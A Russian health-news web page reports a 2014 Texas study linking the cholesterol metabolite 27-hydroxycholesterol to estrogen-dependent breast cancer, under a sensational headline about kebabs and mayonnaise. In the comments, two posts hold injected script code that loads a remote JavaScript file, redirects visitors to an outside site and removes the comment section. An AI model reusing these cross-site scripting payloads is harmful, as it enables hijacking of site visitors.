Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Шашлычок, майонезик, масл...  >>  Шашлычок, майонезик, маслице... Вызывают рак груди
 
Обратная связь
 

Шашлычок, майонезик, маслице... Вызывают рак груди

Размер шрифта
07 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Команда исследователей из Техаса (США) обнаружила, что во время переваривания холестерина вырабатывается вещество, стимулирующее развитие эстроген-зависимого рака груди.

Шашлычок, майонезик, маслице... Вызывают рак груди

Ученые выяснили, что один из метаболитов холестерина – 27-гидроксихолестерин (далее - 27-ОН) – провоцирует рост эстроген-чувствительных опухолей молочной железы, которые являются наиболее распространенным типом рака этого органа. Ранее считалось, что эти опухоли активируются только лишь женскими половыми гормонами, и на этом основывается один из методов лечения, суть которого заключается в ограничении поступления эстрогенов к опухолевой массе.

Тот факт, что 27-ОН не менее успешно вызывает развитие рака в молочной железе, отчасти объясняет, почему гормональная терапия нередко оказывается провальной. 

«Эту информацию можно использовать для разработки новых методов лечения рака груди, с помощью которых можно было бы так или иначе заблокировать влияние 27-ОН», – рассказывает доктор Филип Шол, ведущий автор исследования.

Значимость работы техасских ученых, результаты которой были опубликованы в журнале Cell Reports, очень высока.

Каждый год диагностируется более миллиона новых случаев рака груди, из них две трети – эстроген-зависимые. Это значит, что опухолевые клетки на своей мембране содержат рецепторы к женским половым гормонам – эстрогену и/или прогестерону. Это вариант рака особенно часто встречается после менопаузы.

Доктор Шол и его коллеги обнаружили, что 27-ОН запускает рост опухоли посредством молекулярных механизмов, реализующихся в обход эстрогенного пути. Сперва они подтвердили этот факт на клеточных культурах, а затем и на мышах.

Далее они провели серию экспериментов с участием постменопаузальных женщин, поделенных на две группы: у одних был диагностирован эстроген-чувствительный рак груди, у других – нет (контрольная группа). Оказалось, что у женщин из первой группы в тканях молочной железы был значительно повышен уровень 27-ОН, особенно в очаге опухолевых клеток.

По всей видимости, это связано с тем, что в клетках рака груди понижено содержание фермента CYP7B1, основная функция которого как раз-таки и состоит в том, чтобы метаболизировать (уничтожать) 27-ОН. При дальнейшем статистическом анализе выяснилось, что у женщин с карциномой груди с низкой концентрацией этого фермента выживаемость снижена более, чем в 7 раз.

Более того: ранее было показано, что эстроген может повышать ферментативную активность CYP7B1. Таким образом, распространенный вариант химиотерапии, основанный на блокаде эстрогенных рецепторов, может повышать концентрацию 27-ОН и, таким образом, как это ни парадоксально – стимулировать канцерогенез.

«Измерение активности CYP7B1 и концентрации 27-ОН перед назначением эндокринной терапии может радикально повысить эффективность последней», – уверен доктор Шол.

Поэтому, вероятно, мы с вами находимся на пороге революционных изменений в онкомаммологии.

Другие тайны женского здоровья раскрываются на страницах нашего одноименного специального проекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

09 апреля 2014 в 00:58

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего одна таблетка в день – в 2 раза меньше случаев рака груди!   Сон напрямую влияет на рак груди   Прогулки уменьшают риск рака груди! Сколько же гулять?   Московский музей «Живые системы» приглашает всех  
19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас? 26 июня 2013Что пить, чтобы не было рака груди?
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Мифы о лифчике!
Астма! Когда бежать к врачу?
Ответы на все вопросы о раке груди

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.